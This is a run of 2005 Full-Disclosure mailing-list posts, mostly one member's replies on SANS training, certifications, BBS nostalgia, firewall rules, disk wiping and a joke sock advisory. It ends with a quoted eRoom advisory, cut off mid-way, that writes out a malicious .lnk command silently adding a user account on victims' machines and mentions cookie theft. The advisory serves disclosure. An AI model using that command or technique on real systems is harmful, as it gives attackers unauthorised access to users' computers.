and a post-it-note pen with the BlackHat logo on it! biddings up to $510 USD! hell I have some BlackHat stuff that I'll sell for that price too! I'll even autograph 2 posters!!! :-) Exibar - Original Message - From: Josh Perrymon [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 13, 2005 9:56 AM Subject: RE: [Full-disclosure] Re: 0-day for sale on ebay - New auction! This guy is now selling an autographed poster... You gotta be kidding me ... WTF? JP -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, December 12, 2005 5:46 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Re: 0-day for sale on ebay - New auction! It looks like the same person opened another auction: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItemitem=6588680836 -- Please do not reply to this address ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [spam] Re: [Full-disclosure] Hacking Boot camps!
synchronet! Me too! I loved my Synchronet BBS back in the day :-) RIP graphic support, all the doors you could muster... I had forgotten how much fun the scriptable co-sysop was :-) Exibar (Exibar's Lair BBS (whoop whoop!) -Original Message- From: mary [mailto:[EMAIL PROTECTED] Sent: Thursday, December 01, 2005 9:25 PM To: full-disclosure@lists.grok.org.uk Subject: [spam] Re: [Full-disclosure] Hacking Boot camps! Come on... lets go right old school. I loved and ran RA right old school? Hm, okies! ..didn't care for RA, personally - I ran Synchronet and RENEGADE. Thinking back.. Synchronet's scriptable co-sysop was a lot of fun.. -m Pfft.. RENEGADE all the way : WWIV was great for modding too. Vision-X, yep.. I remember a lot of the 'ansi cool-kids' (or whatever...) running that. -MH On Wed, 30 Nov 2005, Christopher Carpenter wrote: Don't forget WWIV and Vision-X. :) WildCAT BBS Anyone :) I remember playing tradewars and calling who knows where to get new text files :) Used Tone-loC a lot more back then :) JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Most common keystroke loggers?
nah, screen grabber and keylogger installed on system, compromised password. Biometrics, SecurID, one time password, usb key fob, actual physical key, something that is not on the system is what would be needed to be secure... perhaps not totally secure, but pretty damn secure using more than just one of the above too a physical key/credit card, USB key, and SecurID used together would be pretty secure... throw in a finger print reader too, why not... hell, DNA scanner like in Gataca too Mike B -Original Message- From: Kyle Lutze [mailto:[EMAIL PROTECTED] Sent: Thursday, December 01, 2005 7:35 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Most common keystroke loggers? Blue Boar wrote: Shannon Johnston wrote: Hi All, I'm looking for input on what you all believe the most common keystroke loggers are. I've been challenged to write an authentication method (for a web site) that can be secure while using a compromised system. I don't think that's possible for all compromise situations, given today's desktop OS software. It might be possible with a Palladium-like system (and you trust that the secure side isn't compromised) and/or a hardware assist that doesn't trust the host OS (think small USB-attached computer on a stick.) However, given your query, if you simply want to play the known-threats game, you can just require that the Client have up-to-date AV and antispyware software, and scans clean. That's a little orthogonal to the issue of trying to be secure in the face of a keylogger installed, but probably a better thing to shoot for. If, for some reason, you only care about the case where a keylogger is installed, then you can go with some scheme like making the user pick numbers of a randomly-scrambled keypad on the screen, with the mouse. Note, however, that keyloggers that grab some portion of the screen surrounding the mouse pointer every time you click have already been observed in the wild. They are designed to specifically defeat this kind of mechanism. Actually, I think there's a relatively easy solution, make it so every single time they want to login, have a different set of characters line up to their password. That didn't make much sense, here's a good example say somebody's password is foobar, on screen there would be a page that shows the new alignment of characters,such as saying a=c, d=3, b=z, etc. so instead of typing foobar the password they would type in for that session would be hnnzck. The next time the screen came up, it would be a=n, b=l, etc. and the password they would enter would be something else. Then, if the computer had a keylogger, not too much anybody could do with that info. Kyle ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!
heheh, I surely do :-) oh yah, and for those wondering it's NOT a test question that I know of ;-) Exibar -Original Message- From: Disco Jonny [mailto:[EMAIL PROTECTED] Sent: Saturday, November 26, 2005 1:59 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [inbox] Re: [Full-disclosure] Hacking Boot camps! erm, he is angry at everyone, you know what a BOFH is yeah? On 11/25/05, Exibar [EMAIL PROTECTED] wrote: wow, SANS must have really hurt you emotionally to be this pissed at them Ex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!
dude Those sounds like words that are coming from someone that tried to pass a SANS exam but failedor someone that thought they could get a job working for SANS but wasn't accepted I'm not saying this happened to you, but there is much emotion in your reply. What SANS course are you basing this on? Did you take any SANS courses? What would you suggest as more ethical than SANS? A vendor given course like Foundstone (McAfee now)? Just curious Exibar -Original Message- From: InfoSecBOFH [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 23, 2005 12:42 PM To: Exibar Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Hacking Boot camps! On 11/23/05, Exibar [EMAIL PROTECTED] wrote: I agree, BUT for someone that is just starting out and want's to get into the InfoSec field. SANS will provide them with a very useful foundation to start from. if they're a PC tech, and don't know where to start, a SANS type course is money well spent. AS LONG AS they back it up with their own practice and research on their own. WRONG. SANS does not provide anything but marketing opportunities for vendors who cannot sell product any other way and a thicker wallet for those at the top of the pyramid scheme. I agree that training when you are starting out is important but SANS is not an ethical or legitimate training institution and does more to harm security than it does to help. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] RE: [Full-disclosure] Hacking Boot camps!: certifications
So am I any smarter for having my CISSP over a GIAC?... I dont think so.. but the employeers seem to thing so =) Just to chime in a personal opinionThe GIAC exams (NOT their new Silver level, but the Gold level) is worth more to me than CISSP. Why do you ask. CISSP only requires you to take an exam, pass, and you get your cert. The GIAC GOLD certs require you to write a paper, of varying length per cert, and pass it and 1 or 2 exams in order to get yoru cert. It's one thing to be able to go to a week long class, brush up on a few points here and there, take an exam and pass to get a cert, CISSP. It's another copletely different thing to be able to comprehend the information enough to be able to write a 20 - 75 page paper on the subject, have it read and graded by experts in the field, and then get the cert. GIAC Even though the GIAC certs generally cover a narrow topic compared to CISSP, you have to know your subject quite well in order to be able to pass that cert. Forget about the silver cert for GIAC... just another exam or two to pass IF I was interviewing someone new for a security position, I'd certainly take this into account before hireing them. Along with many other factors too, of course. Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!
wow, SANS must have really hurt you emotionally to be this pissed at them Ex -Original Message- From: InfoSecBOFH [mailto:[EMAIL PROTECTED] Sent: Thursday, November 24, 2005 4:43 AM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Hacking Boot camps! Bottom line is... and you can ignore the SANS instructor/SANS zealot post... SANS = SHIT. Now that I am in a position with my employer to hire and fire people... I will not even consider an applicant who touts his SANS certification as something to be proud of or something to make him more skilled than the next. And, now that I am in a senior position at my employer, I am doing everything I can to stop my employer from paying the EXTORTION fees to SANS in order to be a part of their what works program and any of their training. You know what makes me smile everyday... the knowledge in knowing that I am not the only senior infosec person at a major corporation who feels this way about SANS. Fuck SANS. FUCK EM ALL! http://dictionary.reference.com/search?q=sans#without sans( P ) Pronunciation Key (snz, sä) prep. Without. -- -- [Middle English, from Old French, blend of Latin sine, without, and absenti, in the absence of, ablative of absentia, absence from absns, absent- present participle of abesse, to be away. See absent.] On 11/23/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Maybe it is not what you know but who you know. Best of luck with that grail thing, finding it is veiled, holding it is easy, keeping it polished is where the work is. -- vote for me On 11/23/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: ... the cert game is nothing more than a lucrative revenue generator. For either the test givers or the vender pusher or the land of test king. a few respectable names in their roster[1]; i wonder why they don't name the instructor giving each presentation on their conference schedule[2]... i have a theory: the more legitimately skilled you are, the less you instruct and the more you are paid. a nice way to convert reputation into ca$h! [maybe i can get in on this racket once i attain the holy grail of CPA, GCFW, CISSP, CISM, CISA, CCNA, CCSE, CCSA, GIAC, GCIA, GSNA, GCFA, GCIH, GCUX, GSEC, QUE, WTFBBQ] 1. http://www.sans.org/instructors.php 2. http://www.sans.org/index.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacking Boot camps!
I agree, BUT for someone that is just starting out and want's to get into the InfoSec field. SANS will provide them with a very useful foundation to start from. if they're a PC tech, and don't know where to start, a SANS type course is money well spent. AS LONG AS they back it up with their own practice and research on their own. Exiabr - Original Message - From: InfoSecBOFH [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, November 22, 2005 7:53 PM Subject: Re: [Full-disclosure] Hacking Boot camps! In my opinion all of the so called hacking training out there is horrible and nothing more than a money grab. Look at the SANS courseware, it is out of date and shit. The best training is to read, google, and play on your own. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
- Original Message - From: Marc Maiffret [EMAIL PROTECTED] To: Exibar [EMAIL PROTECTED]; c0ntex [EMAIL PROTECTED]; Josh Perrymon [EMAIL PROTECTED]; full-d[EMAIL PROTECTED] Sent: Monday, September 26, 2005 4:49 PM Subject: RE: [Full-disclosure] CORE-Impact license bypass snip As far as automated tools go, bah, manually exploiting the holes is certainly the way to go. But, the automated tools usually produce nice pretty reports that you can show the client. They just LOVEE pretty reports with many bright colors and such for the good stuff and dark hacker like colors for the bad stuff :-) Exibar snip I'm playing devils advocate so its not that I completely disagree but I think for the average consultant (99% of consultants) using an automated solution like Core/Canvas is going to do far more for them. Hiya Marc! I completely agree. I actually like both methods, using an automated tool like Retina, Nessus, Foundstone, etc to find the vulns and the weaknesses, then using an individual exploit to try and penetrate that hole. Canvas / Core also have a very good use as well. They are quick, easy to use, and produce those nice reports that the clients like to see, so they get used as well. I didn't mean to imply that the consultants create their own exploits, not many I know could even begin to do that, only a couple are talented enough to do just that. Even for those very few, it's just not feasable from a time perspective. Much quick and cost effective to use what's out there. Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock
I've found out that using Dave's right Sock 1.0 along with Sandals 2.0 will cause this vulnerability to become very appearant and much worse. With this known, Dave's rigth sock 1.0 should never EVER be used with any version of Sandals (currently at v2.0). exibar - Original Message - From: Dave Cawley [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 08, 2005 12:10 PM Subject: [Full-disclosure] Secuirty Hole Found In Dave's Sock Date: 9/8/2005 Vulnerability Found: Hole In Dave's Socket Affected System: Dave's Right Sock Severity: Rating: Moderately Critical Impact: System access Where: Foot Description of Vulnerability: This morning while putting my socks on I found a small (1/4 inch) hole by my big toe. This could be exploited by a virus through the bottom of the foot or under the toe nail. This could be used to compromise Dave's entire system. Solution: No permanent solution is currently available. A work around is to wear the sock on the other foot to have the hole above the small toe where it will not be furthur enlarged, it will proboably fold over and partially cover the vulnerability. Permanent solution coming in either a sock darning or upgrading the unit to a new sock. Time Table: Found at 7:48am on Sept 8th, 1005 Work around figured out at 7:49am on Sept 8th, 2005 Permanent Solution Pending Credits: Found by Dave References: No references available. *** Dave D. Cawley | High Speed Internet |The number of Unix installations Duryea, PA | has grown to 10, with more expected. (570)451-4311 x104 | - The Unix Programmer's Manual,1972 [EMAIL PROTECTED] | *** URL = http://www.adelphia.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock
Because of this hole, SANS have just gone from green to argyle as well exibar - Original Message - From: Exibar [EMAIL PROTECTED] To: Dave Cawley [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, September 08, 2005 1:31 PM Subject: Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock I've found out that using Dave's right Sock 1.0 along with Sandals 2.0 will cause this vulnerability to become very appearant and much worse. With this known, Dave's rigth sock 1.0 should never EVER be used with any version of Sandals (currently at v2.0). exibar - Original Message - From: Dave Cawley [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 08, 2005 12:10 PM Subject: [Full-disclosure] Secuirty Hole Found In Dave's Sock Date: 9/8/2005 Vulnerability Found: Hole In Dave's Socket Affected System: Dave's Right Sock Severity: Rating: Moderately Critical Impact: System access Where: Foot Description of Vulnerability: This morning while putting my socks on I found a small (1/4 inch) hole by my big toe. This could be exploited by a virus through the bottom of the foot or under the toe nail. This could be used to compromise Dave's entire system. Solution: No permanent solution is currently available. A work around is to wear the sock on the other foot to have the hole above the small toe where it will not be furthur enlarged, it will proboably fold over and partially cover the vulnerability. Permanent solution coming in either a sock darning or upgrading the unit to a new sock. Time Table: Found at 7:48am on Sept 8th, 1005 Work around figured out at 7:49am on Sept 8th, 2005 Permanent Solution Pending Credits: Found by Dave References: No references available. *** Dave D. Cawley | High Speed Internet |The number of Unix installations Duryea, PA | has grown to 10, with more expected. (570)451-4311 x104 | - The Unix Programmer's Manual,1972 [EMAIL PROTECTED] | *** URL = http://www.adelphia.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock
the Soloman socks. long may they live :-) Exibar - Original Message - From: Mary Landesman [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 08, 2005 2:33 PM Subject: Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock This flaw is incredibly old. In the latter part of the 90s, Dr. Solomon's antivirus team assisted afflicted users by distributing socks at various worldwide conferences. Alas, the socks - and presumably the antivirus software - were later acquired by McAfee, Inc. Since then, McAfee has not only failed to continue supporting the socks that were released by Solomon, it has not updated nor released any further socks. As such, the vulnerability has been largely ignored - only to be 'rediscovered' by Dave several years later. Another flaw with Dave's report: He indicates the vulnerable system is the Right sock. Indeed, research consistently indicates the Left sock is equally vulnerable. Regards, -- Mary - Original Message - From: Dave Cawley [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 08, 2005 12:10 PM Subject: [Full-disclosure] Secuirty Hole Found In Dave's Sock Date: 9/8/2005 Vulnerability Found: Hole In Dave's Socket Affected System: Dave's Right Sock Severity: Rating: Moderately Critical Impact: System access Where: Foot Description of Vulnerability: This morning while putting my socks on I found a small (1/4 inch) hole by my big toe. This could be exploited by a virus through the bottom of the foot or under the toe nail. This could be used to compromise Dave's entire system. Solution: No permanent solution is currently available. A work around is to wear the sock on the other foot to have the hole above the small toe where it will not be furthur enlarged, it will proboably fold over and partially cover the vulnerability. Permanent solution coming in either a sock darning or upgrading the unit to a new sock. Time Table: Found at 7:48am on Sept 8th, 1005 Work around figured out at 7:49am on Sept 8th, 2005 Permanent Solution Pending Credits: Found by Dave References: No references available. *** Dave D. Cawley | High Speed Internet |The number of Unix installations Duryea, PA | has grown to 10, with more expected. (570)451-4311 x104 | - The Unix Programmer's Manual,1972 [EMAIL PROTECTED] | *** URL = http://www.adelphia.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk Cleaning Tools
Dban gets my vote as well. Plus can't beat the price, it's Free :-) Exibar - Original Message - From: the.soylent [EMAIL PROTECTED] To: Bob the Builder [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, August 31, 2005 9:48 AM Subject: Re: [Full-disclosure] Disk Cleaning Tools -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I prefer Darik's Boot and Nuke get it here: http://dban.sourceforge.net/ cheers, soylent Bob the Builder schrieb: Hi, I am looking at software for securely erasing information on disks. Other than stuff like Eraser and Cleanup what other tools have people found useful/reliable. Cheers, Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDFbUXY86qEhC92cgRAnHWAJ4jWvwH9Wb87j4Safo0dX8jspBKNACdHfGz hfFNM7zj8oU3RuybCB8oQ/E= =PW5b -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Fwd: [Full-disclosure] Disk Cleaning Tools
yup, use Dban first to wipe the drive, then re-image it...you do have a clean image to revert back to right? :-) or use VMware and revert back to the snapshot after wiping the drive. Exibar - Original Message - From: Bob the Builder [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, August 31, 2005 10:37 AM Subject: Re: Fwd: [Full-disclosure] Disk Cleaning Tools Hmm, perhaps I should have clarified, I was hoping to be able to use the disk and operating systems afterwards, I was looking for a more surgical approach, i.e. deleting specific files, or even better something clever enough to know what registry keys and directories to wipe to save an infinite quantity of setting up. Cheers, Bob On Wed, 2005-08-31 at 14:47 +0100, Marek Isalski wrote: Pillar-drill, every time. winsoc [EMAIL PROTECTED] 31/08/2005 14:44:23 You could use semtex, this will certainly erase all your pr0n and other nasty habits from your drives. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: JA
I don't know about y'all, but if I was admin of a public ISP (or whatever), I wouldn't want to give anyone the idea that I'm smarter than everyone on the list that's just begging to be hacked/defaced/owned/etc exibar - Original Message - From: Bardus Populus [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, August 29, 2005 1:02 AM Subject: [Full-disclosure] Re: JA [EMAIL PROTECTED], please follow your own rules. Missouri FreeNet staff and users are both held to the same general rules of conduct, as only a uniform policy of openness and respect can be reasonably expected to further MFN's goal of universal education. -bp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] [Full-disclosure] RE: Example firewall script
Wasn't the original poster's question about FW rules and not ACL's? If you had ONLY Allow ANY ANY, why bother having the firewall in place at all? You'll never be LESS secure from the nasties on the 'net than that... well unless you're just running a base un-patche OS, etc... If you had only Deny ANY ANY, nothing would get in or out through that firewall, so why wouldn't that be the most secure rule? Again, might as well just unplug from the 'net completely, you'll never be more secure from the nasties on the 'net than that. I kinda assumed that people would realize that these are not practical rules to have in place without other rules backing them up. I for one don't believe you should EVER have an Allow ANY ANY rule, anywhere in your rule list, Deny ANY ANY should be the last rule, IMHO. heheh, I never meant to be the catalyst for such a huge battle between people Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Saturday, August 27, 2005 12:42 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] RE: Example firewall script = ORIGINAL MESSAGE: - Date: Sat, 27 Aug 2005 From: Exibar Subject: Example firewall script The absolute worse Firewal rule you can have: Allow ANY ANY The best: Deny ANY ANY = REPLY: --- Actually, that's not true. I would agree that as a general rule of thumb you should have a deny statement at the end of every ACL. In fact, Cisco places an implicit DENY ANY ANY at the end of their ACL's automatically. However, Access Control Lists are not firewalls. Yes, we use them as firewalls, but that's not what they are. ACL's ARE TRAFFIC SHAPING DEVICES. As traffic shaping devices, they can be used for security, but they are also used for management purposes. For instance; many Autonomous Systems are multi-homed. There are decisions to be made about how traffic will flow in and out of the AS. You also have to decide if you wish to be a transit AS or not. ACLs are the tool that you use to control your traffic. While an ACL being used as a security device should have a deny statement at the end, proper construction of the ACL is more about following the proper construction rules. This is actually a huge subject, far too big for an individual e-mail to a list. But there are some basic rules to keep in mind: ACL's analyze traffic from top to bottom, so keep your most specific entries at the top, with more general entries near the bottom; and do your permits before your denys. That means you deal with hosts first, then subnets, then networks, and at each level you have your permit statements before your deny statements. The reason for this is because once a packet matches a line, it's dealt with right then and there. You don't want to have a packet thrown away just before a line that would have permitted it. There are also issues of what KIND of ACL to use and where to place them; Inbound or Outbound. In terms of the original question, the only difference between a good line item or a bad line item is whether or not the syntax is correct. The only difference between a good ACL and a bad ACL is whether or not it's structure is properly designed and whether or not it's placed in the proper location. This subject REALLY calls for a book, not an e-mail response. I've said very little in this post and look at all the room it took up. ++ mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] RE: [Full-disclosure] RE: Example firewall script
Exactly! FireWall 101 if you will :-) Exibar -Original Message- From: Jan Nielsen [mailto:[EMAIL PROTECTED] Sent: Saturday, August 27, 2005 2:25 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] RE: [Full-disclosure] RE: Example firewall script I think the rules explained here are not intended to be actual rules in a firewall, but more of a way to explain what is secure and what is not, correct me if im wrong. Oh and btw, acl's ARE used in CBAC (cisco ios fw) they are just a tad more intelligently created than in a regular acl. Jan -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: 27. august 2005 18:42 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] RE: Example firewall script = ORIGINAL MESSAGE: - Date: Sat, 27 Aug 2005 From: Exibar Subject: Example firewall script The absolute worse Firewal rule you can have: Allow ANY ANY The best: Deny ANY ANY = REPLY: --- Actually, that's not true. I would agree that as a general rule of thumb you should have a deny statement at the end of every ACL. In fact, Cisco places an implicit DENY ANY ANY at the end of their ACL's automatically. However, Access Control Lists are not firewalls. Yes, we use them as firewalls, but that's not what they are. ACL's ARE TRAFFIC SHAPING DEVICES. As traffic shaping devices, they can be used for security, but they are also used for management purposes. For instance; many Autonomous Systems are multi-homed. There are decisions to be made about how traffic will flow in and out of the AS. You also have to decide if you wish to be a transit AS or not. ACLs are the tool that you use to control your traffic. While an ACL being used as a security device should have a deny statement at the end, proper construction of the ACL is more about following the proper construction rules. This is actually a huge subject, far too big for an individual e-mail to a list. But there are some basic rules to keep in mind: ACL's analyze traffic from top to bottom, so keep your most specific entries at the top, with more general entries near the bottom; and do your permits before your denys. That means you deal with hosts first, then subnets, then networks, and at each level you have your permit statements before your deny statements. The reason for this is because once a packet matches a line, it's dealt with right then and there. You don't want to have a packet thrown away just before a line that would have permitted it. There are also issues of what KIND of ACL to use and where to place them; Inbound or Outbound. In terms of the original question, the only difference between a good line item or a bad line item is whether or not the syntax is correct. The only difference between a good ACL and a bad ACL is whether or not it's structure is properly designed and whether or not it's placed in the proper location. This subject REALLY calls for a book, not an e-mail response. I've said very little in this post and look at all the room it took up. ++ mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [spam] Re: [Full-disclosure] An old/new security list
Bah! FTP's not guaranteed to be replicated I simply zip my critical data up, encrypt it, and post it to the alt.binaries.big-boob usenet groups Literally let the world's server be my backup :-) Exibar -Original Message- From: Technica Forensis [mailto:[EMAIL PROTECTED] Sent: Tuesday, August 23, 2005 11:15 AM To: full-disclosure@lists.grok.org.uk Subject: [spam] Re: [Full-disclosure] An old/new security list On 8/22/05, Ill will [EMAIL PROTECTED] wrote: thinking security-minded people always backed up their hdds daily :D Real men don't do backups, they just put their work on an FTP site and let the world mirror it. --Linus Torvalds ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE: eRoom Multiple Security Issues
I don't see how uploading a .LNK file to E-Room would cause the file to be
executed. Wouldn't a .LNK file be treated as an Internet Link and attempt to
be rendered in Internet Explorer? Any chance of you posting your exact .lnk
file to the list? I must be missing something inbetween the jigs and the
reels...
With the code you supplied for the cookie grabbing, couldn't you use that
same code for any cookie harvesting as long as you know the name of the cookie
you want to grab? Of course the trick would be to get a link to your HTML
code up on the site you wish to harvest the cookies from.
Exibar
- Original Message -
From: c0ntex [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, July 06, 2005 3:12 PM
Subject: [Full-disclosure] eRoom Multiple Security Issues
/*
*
$ An open security advisory #9 - eRoom v6.* Vulnerabilities
*
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote
*
$ This advisory and/or proof of concept code must not be used for
commercial gain.
*
Documentum eRoom
http://www.documentum.com
Documentum eRoom enables enterprises to become more productive,
efficient, and agile by bringing
together people, processes, and content. In fact, more than 1000
Global 2000 enterprises use
Documentum eRoom to optimize key projects and processes.
eRoom has some vulnerabilities in that it does not deal with
attached files or handle cookies in
a secure manner. This being the case, it is possible to abuse trust
between users utilising the
system, execute code on systems of valid users and compromise user
accounts by stealing/replaying
their session cookies.
Issues
--
1) Attaching malicious files
2) Stealing and replaying cookies
- I am unable to verify if the replay attack and cookie time out
effects all versions of eRoom
6.* as I do not have access to a default installation and am
unable to find a demo version
that I can use, though the chances are it is. I can guarantee
that cookies can be stolen from
all versions and java script / HTML can be run from within an
attached file.
1 - Attached files
--
eRoom allows a user to attach files into the website to share with
other users, however there is
no restriction on the type of file that can be attached. This can be
abused to remotly compromise
the systems of eRooms users.
If an .exe file is uploaded, when the user clicks on the file the
usual what do you want to do
with this file box pops up and as such, this does not seem a big
problem. However, this check can
be bypassed by uploading a .lnk file (windows shortcut) to the site,
which contains any command you
wish, I used the following:
%SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD
proving it is possible to have a command run on the remote users
system once the user clicks on the
file. Notice there is no further user interaction required and no
pop-up box is recieved, the .lnk
just gets downloaded by the eRoom plugin in the background and gets
run, adding a user account to
the system.
There are no warnings given to the user about the file containing a
link to an executable image, and
as such, it remains an invisible compromise.
The downloaded file will be left in
C:\Documents and Settings\user\Application Data\eRoom\eRoom
Client\V6\Attachments\
{blahblah-blah-blah-blah-1234567890}\0_2bcb\budget_info.lnk
2 - Stealing and replaying cookies
--
